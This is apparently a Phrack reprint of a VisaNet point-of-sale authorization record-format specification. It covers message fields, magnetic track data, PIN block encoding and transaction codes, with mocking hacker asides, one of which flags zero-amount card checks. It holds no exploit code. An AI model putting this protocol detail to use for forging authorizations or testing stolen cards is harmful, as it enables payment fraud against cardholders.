7.01 TRACK 1 CHARACTER DEFINITION 7.02 TRACK 2 CHARACTER DEFINITION 7.03 AUTHORIZATION MESSAGE CHARACTER SET 7.04 CHARACTER CONVERSION SUMMARY 7.05 ACCOUNT DATA LUHN CHECK 7.06 CALCULATING AN LRC 7.07 TEST DATA FOR RECORD FORMAT "J" 7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST 7.07.2 RESPONSE MESSAGE FOR TEST DATA ------------------------------------------------------------------------------- 1.0 INTRODUCTION This document describes the request and response record formats for the VisaNet second generation Point-Of-Sale (POS) authorization terminals and VisaNet Authorization services. This document describes only record formats. Other documents describe communication protocols and POS equipment processing requirements. Figure 1.0 represents the authorization request which is transmitted to VisaNet using public communication services and the authorization response returned by VisaNet. Debit transactions include a third confirmation message. POS DEVICE VISANET ---------- ------- AUTHORIZATION REQUEST | TRANSMITTED TO A |----------> VISANET AUTHORIZATION AUTHORIZATION RESPONSE HOST SYSTEM | | RETURNED BY THE | VISANET HOST TO <--------| THE POS TERMINAL DEBIT RESPONSE CONFIRMATION--------------->TRANSMITTED TO HOST SYSTEM FIGURE 1.0 Authorization request and response. This document describes the record formats to be used for the development of new applications. Current formats or transition formats will be provided on request. The usage of some fields have changed with the new record formats. Applications which were developed to previous specifications will continue to be supported by VisaNet services. The new formats and field usage is provided with the intention of moving all new applications developed to the new formats. 2.0 APPLICABLE DOCUMENTS The following documents provide additional definitions and background. 2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION 1. EIS1051 - External Interface Specification Second Generation Authorization Link Level Protocol 2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE 1. EIS1081 - External Interface Specification Second Generation Data Capture Record Formats 2. EIS1052 - External Interface Specification Second Generation Data Capture Link Level Protocol 3.0 AUTHORIZATION RECORD FORMATS This section contains the record formats for the authorization request, response and confirmation records. The ANSI X3.4 character set is used to represent all record data elements. (See Section 7) In the record formats on the following pages, the column heading FORMAT is defined as: "NUM" represents numeric data, the numbers 0 through 9, NO SPACES. "A/N" represents alphanumeric data, the printing character set. "FS" represents a field separator character as defined in ANSI X3.4 as a "1C" hex 3.01 REQUEST RECORD FORMAT Table 3.01b provides the record format for the authorization request records. Section 4 provides the data element definitions. The authorization request record is a variable length record. The record length will depend on the source of the customer data and the type of authorization request. Refer to Table 3.01c to determine which GROUPS to use from Table 3.01a TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS: RECORD | APPLICATION | FORMAT | TYPE | REMARKS ------------------------------------------------------------------------------- J | CREDIT | All non-ATM card transactions (Visa cards, other credit | | cards, private label credit cards and check guarantee) G | DIAL DEBIT | Visa supported ATM debit cards The selection of format type J and G or any other value from Table 3.01a will depend on the VisaNet services that are desired. Contact your Visa POS member support representative for assistance in determining the required formats. TABLE 3.01a Record Format Summary Non-CVV CVV Terminal Compliant Compliant Generation Description ------------------------------------------------------------------------------- 0 RESERVED 1 N First Vutran 2 8 First Sweda 4 R First Verifone 6 P First Amex 7 3 First Racal A Q First DMC B R First GTE & Omron [velly intelestink] C 9 First Taltek S U First Datatrol - Standard Oil D T First Datatrol E RESERVED 5 F Second Non-REPS-Phase 1 CVV G Second Dial Debit H Second Non-REPS-Phase 2 CVV I Second RESERVED - Non-REPS Controller J Second REPS - Terminal & Controller K Second RESERVED L Second RESERVED - Leased VAP M Second RESERVED - Member Format N-O RESERVED V-Y RESERVED Z Second RESERVED - SDLC Direct [hmmm] ------------------------------------------------------------------------------- TABLE 3.01b Second Generation Authorization Request Record Format see Group Byte# Length Format Name section ------------------------------------------------------------------------------- 1 1 A/N Record Format 4.01 2 1 A/N Application Type 4.02 3 1 A/N Message Delimiter 4.03 4-9 6 NUM Acquirer Bin 4.04 10-21 12 NUM Merchant Number 4.05 22-25 4 NUM Store Number 4.06 26-29 4 NUM Terminal Number 4.07 30-33 4 NUM Merchant Category Code 4.08 34-36 3 NUM Merchant Country Code 4.09 37-41 5 A/N Merchant City Code (ZIP in the U.S.) 4.10 42-44 3 NUM Time Zone Differential 4.11 45-46 2 A/N Authorization Transaction Code 4.12 47-54 8 NUM Terminal Identification Number 4.13 55 1 A/N Payment Service Indicator 4.14 56-59 4 NUM Transaction Sequence Number 4.15 60 1 A/N Cardholder Identification Code 4.16 61 1 A/N Account Data Field 4.17 Variable 1-76 Customer Data Field 4.18.x (See: DEFINITIONS in Table 3.01d) Variable 1 "FS" Field Separator 4.19 Variable 0-32 A/N Cardholder Identification Data 4.20 Variable 1 "FS" Field Separator 4.21 Variable 3-12 NUM Transaction Amount 4.22 Variable 1 "FS" Field Separator 4.23 Variable 2 A/N Device Code/Industry Code 4.24 Variable 1 "FS" Field Separator 4.25 Variable 0-6 NUM Issuing/Receiving Institution ID 4.26 I Variable 1 "FS" Field Separator 4.27 Variable 3-12 NUM Secondary Amount (Cashback) 4.28 II Variable 1 "FS" Field Separator 4.29 Variable 25 A/N Merchant Name 4.30 Variable 13 A/N Merchant City 4.31 Variable 2 A/N Merchant State 4.33 Variable 1-14 A/N Sharing Group 4.33 Variable 1 "FS" Field Separator 4.34 Variable 0-12 NUM Merchant ABA 4.35 Variable 0-4 NUM Merchant Settlement Agent Number 4.36 Variable 1 "FS" Field Separator 4.37 Variable 6 NUM Agent Number 4.38 Variable 6 NUM Chain Number 4.39 Variable 3 NUM Batch Number 4.40 Variable 1 A/N Reimbursement Attribute 4.41 III Variable 1 "FS" Field Separator 4.42 Variable 6 A/N Approval Code 4.43 Variable 4 NUM Settlement Date (MMDD) 4.44 Variable 4 NUM Local Transaction Date (MMDD) 4.45 Variable 6 NUM Local Transaction Time (HHMMSS) 4.46 Variable 6 A/N System Trace Audit Number 4.47 Variable 2 A/N Original Auth. Transaction Code 4.48 Variable 1 A/N Network Identification Code 4.49 IV Variable 1 "FS" Field Separator 4.50 NOTE: The maximum length request can be as long as 290 bytes for an Interlink Debit Cancel request (including the STX/ETX/LRC). Since some terminals may be limited to a 256 byte message buffer, the following tips can save up to 36 bytes: - Limit fields 4.22 and 4.28 to 7 digits - Fields 4.26, 4.35 and 4.36 are not required for a debit request - Field 4.33 can be limited to 10 bytes TABLE 3.01C Legend for GROUP (from Table 3.01b) FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD I II III IV FORMAT Check guarantee X J Non-ATM card transactions (Visa cards, other X X J credit cards, private label credit cards Visa supported ATM debit cards: Purchase, Return X X X G and Inquiry Request Visa supported ATM debit cards: Interlink Cancel X X X X G Request TABLE 3.01d Definitions for Customer Data Field (from Table 3.01b) Length Format Field Name See Section MAGNETICALLY read credit cards (SELECT ONE): up to 76 A/N Track 1 Read Data 4.18.1 up to 37 NUM Track 2 Read Data 4.18.2 MANUALLY entered credit cards: up to 28 NUM Manually Entered Account Number 4.18.3.1 1 "FS" Field Separator 4 NUM Manually Entered Expiration Date (MMYY) 4.18.3.2 MACHINE read and MANUALLY entered check acceptance requests: 1 to 28 A/N Check Acceptance ID 4.18.4.1 1 "FS" Field Separator 4.18.4.2 3 to 6 A/N Manually Entered Check Acceptance Data 4.18.4.2 MAGNETICALLY read ATM debit cards: up to 37 NUM Track 2 Read Data 4.18.2 3.02 RESPONSE RECORD FORMAT Table 3.02a provides the record format for the authorization response records. Section 5 provides the data element definitions. The authorization response record is variable length for record formats "J" & "G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a. Table 3.02a Second Generation Authorization Response Record see Group Byte# Length Format Name section ------------------------------------------------------------------------------- - 1 1 A/N Payment Service Indicator 5.01 2-5 4 NUM Store Number 5.02 6-9 4 NUM Terminal Number 5.03 10 1 A/N Authorization Source Code 5.04 11-14 4 NUM Transaction Sequence Number 5.05 15-16 2 A/N Response Code 5.06 17-22 6 A/N Approval Code 5.07 23-28 6 NUM Local Transaction Date (MMDDYY) 5.08 29-44 16 A/N Authorization Response Message 5.09 45 1 A/N AVS Result Code 5.10 Variable 0/15 NUM Transaction Identifier 5.11 Variable 1 "FS" Field Separator 5.12 Variable 0/4 A/N Validation Code 5.13 I Variable 1 "FS" Field Separator 5.14 Variable 1 A/N Network Identification Code 5.15 Variable 4 NUM Settlement Date (MMDD) 5.16 Variable 6 A/N System Trace Audit Number 5.17 Variable 12 A/N Retrieval Reference Number 5.18 II Variable 6 NUM Local Transaction Time (HHMMSS) 5.19 Table 3.02b Legend for GROUP (from Table 3.02a) FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD I II FORMAT All non-ATM card transactions (Visa cards, other credit X J cards, private label credit cards and check guarantee) Visa supported ATM debit cards: Purchase, Return, Inquiry X X G Request and Interlink Cancel Request 3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY) Table 3.03 provides the record format for the second generation debit response confirmation record. Section 6 provides the data element definitions. The debit response confirmation record is a fixed length record. TABLE 3.03 Second Generation Debit Response Confirmation Record see Group Byte# Length Format Name section ------------------------------------------------------------------------------- - 1 1 A/N Network ID Code 6.01 2-5 4 NUM Settlement Date (MMDD) 6.02 I 6-11 6 A/N System Trace Audit Number 6.03 4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS The following subsections will define the authorization request record data elements. 4.01 RECORD FORMAT There are several message formats defined within the VisaNet systems. The second generation authorization format is specified by placing one of the defined values in the record format field. Table 4.01 provides a brief summary of the current formats. TABLE 4.01 VisaNet Authorization Record Format Designators RECORD FORMAT RECORD DESCRIPTION ------------------------------------------------------------------------------- - J All non-ATM card transactions (Visa cards, other credit cards, private label credit cards and check guarantee) G Visa supported ATM debit cards 4.02 APPLICATION TYPE The VisaNet authorization system supports multiple application types ranging from single thread first generation authorization to interleaved leased line authorization processing. Table 4.02 provides a summary of application type. TABLE 4.02 VisaNet Application Designators APPLICATION USE WITH TYPE APPLICATION DESCRIPTION REC. FMT. ------------------------------------------------------------------------------- - 0 Single authorization per connection J and G 2 Multiple authorizations per connection J and G single-threaded 4 Multiple authorizations per connect, J interleaved 6 Reserved for future use --- 8 Reserved for future use --- 1,3,5,7 Reserved for VisaNet Central Data Capture (CDC) --- 9 Reserved for VisaNet Down Line Load --- A-Z Reserved for future use --- 4.03 MESSAGE DELIMITER The message delimiter separates the format and application type designators fro m the body of the message. The message delimiter is defined as a "." (period) 4.04 ACQUIRER BIN This field contains the Visa assigned six-digit Bank Identification Number (BIN ) The acquirer BIN identifies the merchant signing member that signed the merchan t using the terminal. NOTE: The merchant receives this number from their signing member. 4.05 MERCHANT NUMBER This field contains a NON-ZERO twelve digit number, assigned by the signing member and/or the merchant, to identify the merchant within the member systems. The combined Acquirer BIN and Merchant Number are required to identify the merchant within the VisaNet systems. 4.06 STORE NUMBER This field contains a NON-ZERO four-digit number assigned by the signing member and/or the merchant to identify the merchant store within the member systems. The combined Acquirer BIN, Merchant Number, and Store Number are required to identify the store within the VisaNet systems. 4.07 TERMINAL NUMBER This field contains a NON-ZERO four-digit number assigned by the signing member and/or the merchant to identify the merchant store within the member systems. This field can be used by systems which use controllers and/or concentrators to identify the devices attached to the controllers and/or concentrators. 4.08 MERCHANT CATEGORY CODE This field contains a four-digit number assigned by the signing member from a list of category codes defined in the VisaNet Merchant Data Standards Handbook to identify the merchant type. 4.09 MERCHANT COUNTRY CODE This field contains a three-digit number assigned by the signing member from a list of country codes defined in the VisaNet V.I.P. System Message Format Manuals to identify the merchant location country. 4.10 MERCHANT CITY CODE This field contains a five character code used to further identify the merchant location. Within the United States, the give high order zip code digits of the address of the store location are used. Outside of the United States, this field will be assigned by the signing member. 4.11 TIME ZONE DIFFERENTIAL This field contains a three-digit code used to calculate the local time within the VisaNet authorization system. It is calculated by the signing member, providing the local time zone differential from Greenwich Mean Time (GMT). The first two digits specify the magnitude of the differential. Table 4.11 provide s a brief summary of the Time Zone Differential codes. TABLE 4.11 Time Zone Differential Code Format Byte # Length Format Contents ------------------------------------------------------------------------------- - 1 1 NUMERIC DIRECTION 0 = Positive, Local Ahead of GMT, offset in hours 1 = Negative, Local Time behind GMT, offset in hours 2 = Positive, offset in 15 minute increments 3 = Negative, offset in 15 minute increments 4 = Positive, offset in 15 minute increments, participating in daylight savings time 5 = Negative, offset in 15 minute increments, participating in daylight savings time 6-9 = INVALID CODES 2-3 2 NUMERIC MAGNITUDE For Byte #1 = 0 or 1 0 <= MAGNITUDE <= 12 For Byte #1 = 2 through 5 0 <= MAGNITUDE <= 48 ------------------------------------------------------------------------------- - A code of 108 indicates the local Pacific Standard time which is 8 hours behind GMT. 4.12 AUTHORIZATION TRANSACTION CODE This field contains a two-character code defined by VisaNet and generated by th e terminal identifying the type of transaction for which the authorization is requested. Table 4.12 provides a summary of the transaction codes. TABLE 4.12 Authorization Transaction Codes TRAN CODE TRANSACTION DESCRIPTION ------------------------------------------------------------------------------- 54 Purchase 55 Cash Advance 56 Mail/Telephone Order 57 Quasi Cash 58 Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested [ah-hah!] 64 Repeat: Purchase 65 Repeat: Cash Advance 66 Repeat: Mail/Telephone Order (MO/TO) 67 Repeat: Quasi Cash 68 Repeat: Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested 70 Check guarantee, must include RIID (field 4.26) 81 Proprietary Card 84 Private Label Purchase 85 Private Label, Cash Advance 86 Private Label Mail/Telephone Order (MO/TO) 87 Private Label Quasi Cash 88 Private Label Card Authentication - Transaction Amt & Secondary Amt must equal $0.00, AVS may be requested 93 Debit Purchase 94 Debit Return 95 Interlink Debit Cancel (see NOTE below) ------------------------------------------------------------------------------- - NOTE (for TRANSACTION CODE = 95) -------------------------------- - For Interlink Debit CANCEL request message, all of the fields in Groups I and II will come from the original transaction request or the original transaction response, with the exception of the following: - The AUTHORIZATION TRANSACTION CODE will need to be changed to the Debit CANCEL code. - The TRANSACTION SEQUENCE NUMBER should be incremented in the normal fashion. - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE (PIN) will need to be re-entered. 4.13 TERMINAL IDENTIFICATION NUMBER This field contains an eight-digit code that must be greater than zero, defined by the terminal down line load support organization. Support may be provided b y the Visa's Merchant Assistance Center (MAC), the signing member, or a third party organization. The terminal ID is used to uniquely identify the terminal in the terminal support system and identification for the VisaNet Central Data Capture (CDC). The terminal ID may not be unique within the VisaNet system. Each terminal support provider and member that provides its own terminal suppor t can assign potentially identical terminal IDs within its system. The terminal ID can be used by the terminal down line load system to access the terminal application and parameter data from a system data base when down line loading a terminal. [huh?] NOTE: It is recommended that [the] Terminal ID Number should be unique within the same Acquirer's BIN. 4.14 PAYMENT SERVICE INDICATOR This is a one-character field used to indicate a request for REPS qualification . Table 4.14 provides a summary of the codes. TABLE 4.14 Payment Service Indicator Codes RECORD FORMAT VALUE DESCRIPTION ------------------------------ J Y Yes J N No G Y Yes G N No ------------------------------ [repetitive? you bet] 4.15 TRANSACTION SEQUENCE NUMBER This field contains a four-digit code which is generated by the terminal as the sequence number for the transaction. The sequence number is used by the terminal to match request and response messages. This field is returned by VisaNet without sequence verification. The sequence number is incremented with wrap from 9999 to 0001. 4.16 CARDHOLDER IDENTIFICATION CODE This one-character field contains a code that indicates the method used to identify the cardholder. Table 4.16 provides a summary of the codes. TABLE 4.16 Cardholder Identification Codes ID CODE IDENTIFICATION METHOD ------------------------------------------------------------------------------- - A Personal Identification Number-23 byte static key (non-USA) fnord B PIN at Automated Dispensing Machine - 32 byte static key C Self Svc Limited Amount Terminal (No ID method available) D Self-Service Terminal (No ID method available) E Automated Gas Pump (No ID method available) K Personal Identification Number - 32 byte DUK/PT N Customer Address via Address Verification Service (AVS) S Personal Identification Number - 32 byte static key Z Cardholder Signature - Terminal has a PIN pad @ Cardholder Signature - No PIN pad available F-J,L,M,O-R Reserved for future use T-Y ------------------------------------------------------------------------------- - 4.17 ACCOUNT DATA SOURCE This field contains a one-character code defined by Visa and generated by the terminal to indicate the source of the customer data entered in field 4.18. Table 4.17 provides a summary of codes TABLE 4.17 Account Data Source Codes ACCOUNT DATA SOURCE CODE ACCOUNT DATA SOURCE CODE DESCRIPTION ------------------------------------------------------------------------------- - A RESERVED - Bar-code read B RESERVED - OCR read D Mag-stripe read, Track 2 H Mag-stripe read, Track 1 Q RESERVED - Manually keyed, bar-code capable terminal R RESERVED - Manually keyed, OCR capable terminal T Manually keyed, Track 2 capable X Manually keyed, Track 1 capable @ Manually keyed, terminal has no card reading capability C,E-G,I-P,S, RESERVED for future use U-W,Y-Z,0-9 ------------------------------------------------------------------------------- - NOTE: - If a dual track reading terminal is being used, be sure to enter the correct value of "D" or "H" for the magnetic data that is transmitted - When data is manually keyed at a dual track reading terminal, enter either a "T" or an "X" 4.18 CUSTOMER DATA FIELD This is a variable length field containing customer account or check acceptance ID data in one of three formats. The cardholder account information can be rea d d from the card or it may be entered manually. Additionally the terminal can b e used for check authorization processing with the check acceptance identificatio n number entered by the operator for transmission in this field. NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations, the following requirement must be available as an operating option if the merchant location is found to be generating a disproportionately high percentag e of Suspect Transactions [lets get downright hostile about it] as defined in chapter 9.10 of the VISA U.S.A. Operating Regulations. Specifically, chapter 9.10.B.2 requires that: - The terminal must read the track data using a magnetic stripe reading terminal - The terminal must prompt the wage slave to manually enter the last four digits of the account number - The terminal must compare the keyed data with the last four digits of the account number in the magnetic stripe - If the compare is successful, the card is acceptable to continue in the authorization process and the terminal must transmit the full, unaltered contents of the magnetic stripe in the authorization message. - If the compare fails, the card should not be honored at the Point of Sale 4.18.1 TRACK 1 READ DATA This is a variable length field with a maximum data length of 76 characters. The track 1 data read from the cardholder's card is checked for parity and LRC errors and then converted from the six-bit characters encoded on the card to seven-bit characters as defined in ANSI X3.4. The character set definitions ar e provided in section 7 for reference. As part of the conversion the terminal will strip off the starting sentinel, ending sentinel, and LRC characters. The separators are to be converted to a "^" (HEX 5E) character. The entire track must be provided in the request message. The character set and data content are different between track 1 and track 2. The data read by a track 2 device can not be correctly reformatted and presented as though it were read by a track 1 device. [aw shucks] The converted data can not be modified by addin g or deleting non-framing characters and must be a one-for-one representation of the character read from the track. 4.18.2 TRACK 2 READ DATA This is a variable length field with a maximum data length of 37 characters. The track 2 data read from the cardholder's card is checked for parity and LRC errors and then converted from the six-bit characters encoded on the card to seven-bit characters as defined in ANSI X3.4. The character set definitions ar e provided in section 7 for reference. As part of the conversion the terminal will strip off the starting sentinel, ending sentinel, and LRC characters. The separators are to be converted to a "^" (HEX 5E) character. The entire track must be provided in the request message. The character set and data content are different between track 2 and track 1. The data read by a track 1 device can not be correctly reformatted and presented as though it were read by a track 2 device. The converted data can not be modified by adding or deleting non-framing characters and must be a one-for-one representation of the characte r read from the track. [repetitive? you bet] 4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD) The customer credit card data may be key entered when the card can not be read, when a card is not present, or when a card reader is not available. 4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER This is a variable length field consisting of 5 to 28 alphanumeric characters. The embossed cardholder data, that is key entered, is validated by the terminal using rules for each supported card type. For example, both Visa and Master Card include a mod 10 check digit as the last digit of the Primary Account Number. The Primary Account Number (PAN) is encoded as seven-bit characters as defined in ANSI X3.4. The PAN is then provided in the manually entered record format provided in Table 3.01b. The PAN must be provided without embedded spaces. 4.18.3.2 MANUALLY ENTERED EXPIRATION DATE This four-digit field contains the card expiration date in the form MMYY (month - month-year-year) 4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER The customer data may be card read or manually key entered for check acceptance transactions. 4.18.4.1 CHECK ACCEPTANCE ID This field is a variable length field consisting of 1 to 28 alphanumeric characters. The check acceptance vendor will provide the data format and validation rules to be used by the terminal. Typically the ID consists of a two-digit state code and an ID which may be the customer's drivers license number. 4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA This six-character field contains the customer birth date or a control code in the form specified by the check acceptance processor. 4.19 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.20 CARDHOLDER IDENTIFICATION DATA This field will be 0, 23, 29 or 32 characters in length. The cardholder ID codes shown in Table 4.16 indicates the type of data in this field. Table 4.20 provides a brief summary of the current formats. TABLE 4.20 Cardholder Identification Data Definitions CARDHOLDER VALUE(S) FROM ID LENGTH DESCRIPTION TABLE 4.16 ------------------------------------------------------------------------------- - 0 Signature ID used, No PIN pad is present @,C,D or E 0 Signature ID used on a terminal with a PIN pad Z 23 A PIN was entered on a STATIC key PIN pad A 32 A PIN was entered on a STATIC key PIN pad B 32 A PIN was entered on a DUK/PT key PIN pad K 32 A PIN was entered on a STATIC key PIN pad S 0 to 29 AVS was requested N ------------------------------------------------------------------------------- - 4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID NOTE: The 23 byte static key technology is NOT approved for use in terminals deployed in the Visa U.S.A. region. [thanks nsa!] When a PIN is entered on a PIN pad supporting 23 byte static key technology, th e terminal will generate the following data: 1JFxxyyaaaaaaaaaaaaaaaa Where: 1J Header - PIN was entered f Function Key Indicator - A single byte indicating which, if any, function key was pressed on the PIN pad. This field is currently not edited. Any printable character is allowed. xx PIN Block Format - These two numeric bytes indicate the PIN encryption method used to create the encrypted PIN block. Visa currently supports four methods; 01, 02, 03, & 04. For more information, please refer to the VisaNet Standards Manual, Card Technology Standards, PIN and Security Standards, Section 2, Chapter 3, PIN Block Formats aaaaaaaaaaaaaaaa Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using Table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. 4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID When a PIN is entered on a PIN pad supporting 32 byte static key technology, the terminal will generate the following data: aaaaaaaaaaaaaaaa2001ppzz00000000 Where: aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. 20 - Security Format Code - This code defines that the Zone Encryption security technique was used. 01 - PIN Encryption Algorithm Identifier - This code defines that the ANSI DES encryption technique was used. pp - PIN Block Format Code - This code describes the PIN block format was used by the acquirer. Values are: 01 - Format is based on the PIN, the PIN length, selected rightmost digits of the account number and the pad characters "0" and "F"; combined through an exclusive "OR" operation. 02 - Format is based on the PIN, the PIN length and a user specified numeric pad character. 03 - Format is based on the PIN and the "F" pad character. 04 - Format is the same as "01" except that the leftmost account number digits are selected. zz - Zone Key Index - This index points to the zone key used by the acquirer to encrypt the PIN block. Values are: 01 - First key 02 - Second key 00000000 - Visa Reserved - Must be all zeros For additional information, refer to the VisaNet manual V.I.P. System, Message Formats, Section B: Field Descriptions. Specifically, fields 52 and 53; Personal Identification Number (PIN) Data and Security Related Control Information respectively. 4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal will generate the following 32 bytes: aaaaaaaaaaaaaaaakkkkkkssssssssss Where: aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted PIN block format consists of 64 bits of data. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 64 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand the 64 bit encrypted PIN block, remove four bits at a time and convert them to ANSI X3.4 characters using table 4.20. After this conversion, the 64 bit encrypted PIN block will consist of 16 characters that will be placed in the Expanded Encrypted PIN Block Data field. [repetitive? you bet] kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa Visa assigned, six digit bank identification number. ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded Transaction Counter - Is represented by the concatenation of thes e two hexadecimal fields. The PIN pad serial number is stored as five hex digits minus one bit for a total of 19 bits of data. Th e transaction counter is stored as five hex digits plus one bit for a total of 21 bits of data. These two fields concatenated together will contain 40 bits. Since the VisaNet Second Generation protocol allows only printable characters in data fields, these 40 bits must be expanded to ensure that no values less than hex "20" are transmitted. To expand this 40 bit field, remove four bits at a time and convert them to ASCII characters using table 4.20. After this conversion, this 40 bit field will consist of 10 characters that will be placed in the Expanded TRSM ID & Expanded Transaction Counter Field. TABLE 4.20 PIN Block conversion Table HEXADECIMAL | ANSI X3.4 DATA | CHARACTER --------------+---------------- 0000 | 0 0001 | 1 0010 | 2 0011 | 3 0100 | 4 0101 | 5 0110 | 6 0111 | 7 1000 | 8 1001 | 9 1010 | A 1011 | B 1100 | C 1101 | D 1110 | E 1111 | F ------------------------------- 4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment] When Address Verification Service is requested, this field will contain the mailing address of the cardholder's monthly statement. The format of this field is: or Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second" becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP code. For instance: 1391 ELM STREET 40404 is equivalent to: 1931ELMSTREET40404 P.O. Box 24356 55555 is not equivalent to P.O.BOX2435655555 If a field is not available or not applicable, it may be skipped. If nine digits are available, the last five digits should always be used to pour more sand into the wheels of progress. 4.21 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 16 of 28 **************************************************************************** VisaNet Operations (Continued) 4.22 TRANSACTION AMOUNT This is a variable field from three to twelve digits in length. The transactio n amount includes the amount in 4.28, Secondary Amount. Therefore, field 4.22 must be greater than or equal to field 4.28. The transaction amount is presented by the terminal with an implied decimal point. For example $.01 would be represented in the record as "001". When the terminal is used with an authorization system which supports the US dollar as the primary currency, the amount field must be limited to seven digits (9999999). [...] The terminal may be used with authorization system which support other currencies that require the full twelve-digit field. 4.23 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.24 DEVICE CODE/INDUSTRY CODE This field is used to identify the device type which generated the transaction and the industry type of the merchant. Table 4.24 provides a brief summary of the current codes. TABLE 4.24 Device Code/Industry Code C C O O D D E DEVICE TYPE E INDUSTRY TYPE ------------------------------------------------------------------------------- 0 Unknown or Unsure 0 Unknown or Unsure 1 RESERVED 1 RESERVED 2 RESERVED 2 RESERVED 3 RESERVED 3 RESERVED 4 RESERVED 4 RESERVED 5 RESERVED 5 RESERVED 6 RESERVED 6 RESERVED 7 RESERVED 7 RESERVED 8 RESERVED 8 RESERVED 9 RESERVED 9 RESERVED A RESERVED A RESERVED B RESERVED B Bank/Financial Institution C P.C. C RESERVED D Dial Terminal D RESERVED E Electronic Cash Register (ECR) E RESERVED F RESERVED F Food/Restaurant G RESERVED G Grocery Store/Supermarket H RESERVED H Hotel I In-Store Processor I RESERVED J RESERVED J RESERVED K RESERVED K RESERVED L RESERVED L RESERVED M Main Frame M Mail Order N RESERVED N RESERVED O RESERVED O RESERVED P POS-port P RESERVED Q RESERVED for POS-port Q RESERVED R RESERVED R Retail S RESERVED S RESERVED T RESERVED T RESERVED U RESERVED U RESERVED V RESERVED V RESERVED W RESERVED W RESERVED X RESERVED X RESERVED Y RESERVED Y RESERVED Z RESERVED Z RESERVED ------------------------------------------------------------------------------- - 4.25 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID This six-digit field is provided by the merchant signing member and is present when the terminal is used to process transactions which can not be routed using the cardholder Primary Account Number. When a value is present in this field, it is used as an RIID for all valid transaction codes, field 4.12, except 81 through 88. This field is used as an IIID for transaction codes 81 through 88. Table 4.26 provides a summary of the RIID codes for check acceptance. TABLE 4.26 Check Acceptance RIID Values Vendor RIID --------------------------- JBS, Inc 810000 Telecheck 861400 TeleCredit, West 894300 [note; telecredit has been TeleCredit, East 894400 mutated/eaten by equifax] --------------------------- 4.27 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.28 SECONDARY AMOUNT (CASHBACK) NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field, see section 4.18, has been manually entered. This is a variable length field from three to twelve digits in length. The Secondary Amount is included in field 4.22, Transaction Amount. The secondary amount is presented by the terminal with an implied decimal point . For example $.01 would be represented in the record as "001". This field will contain 000 when no secondary amount has been requested. Therefore, when the terminal is used with an authorization system which supports the US dollar as the primary currency, the secondary amount field must be limited to seven digits (9999999). The terminal may be used with authorization systems which support other currencies that require the full twelve-digit field. 4.29 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.30 MERCHANT NAME This 25-character field contains the merchant name provided by the signing member. the name must correspond to the name printed on the customer receipt. The name is left justified with space fill. The first character position can not be a space. This field must contain the same used in the data capture batch. 4.32 MERCHANT STATE This two-character field contains the merchant location state abbreviation provided by the singing member. The abbreviation must correspond to the state name printed on the customer receipt and be one of the Visa accepted abbreviations. This field must contain the same data used in the data capture batch. 4.33 SHARING GROUP This one to fourteen-character field contains the group of debit card/network types that a terminal may have access to and is provided by the singing member. The values must correspond to one of the Visa assigned debit card /network types. This data is part of the VisaNet debit data. 4.34 FIELD SEPARATOR The authorization record format specifies the use of the "FS" character. 4.35 MERCHANT ABA NUMBER This fixed length field is twelve digits in length. If this field is not used, its length must be zero. If this field is not used, the following field must also be empty. This number identifies the merchant to a debit switch provided by the signing member. The number is provided by the signing member. 4.36 MERCHANT SETTLEMENT AGENT NUMBER This fixed length field is four digits in length. If this field is not used, its length must be zero. If this field is not used, the previous field must also be empty. This number identifies the merchant settling agent. The number is provided by the signing member. 4.37 FIELD 